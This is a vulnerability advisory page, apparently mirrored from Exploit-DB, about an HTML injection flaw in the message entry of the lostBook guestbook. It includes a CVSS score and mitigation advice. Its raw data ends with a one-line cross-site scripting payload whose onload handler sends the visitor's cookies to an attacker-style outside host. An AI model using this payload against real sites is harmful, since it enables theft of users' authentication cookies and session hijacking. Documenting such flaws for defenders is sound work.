header-logo
Suggest Exploit
vendor:
lostBook
by:
Unknown
7.5
CVSS
HIGH
HTML Injection
79
CWE
Product Name: lostBook
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Unknown

HTML Injection Vulnerability in Verylost lostBook

Verylost lostBook is affected by an HTML injection vulnerability in its message entry functionality. This issue allows an attacker to inject malicious HTML and script code into the application, potentially leading to the execution of the attacker's code within the user's browser. This vulnerability can be exploited to steal cookie-based authentication credentials and may allow for other attacks.

Mitigation:

To mitigate this vulnerability, it is recommended to properly validate and sanitize user-supplied input before including it in dynamically generated web page content. Additionally, implementing proper input validation and output encoding can help prevent HTML injection attacks.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10825/info

Reportedly Verylost lostBook is affected by an HTML injection vulnerability in its message entry functionality. This issue is due to a failure of the application to properly validate and sanitize user-supplied input before including it in dynamically generated web page content.

This may allow an attacker inject malicious HTML and script code into the application. An unsuspecting user viewing the post will have the attacker-supplied script code executed within their browser in the context of the vulnerable site. This issue may be leverage to steal cookie based authentication credentials. Other attacks are also possible.

example.com" onload="document.location='http://www.cookiestealer.com?cookie='+document.cookie

Navigation

Suggest Exploit

Services By CQR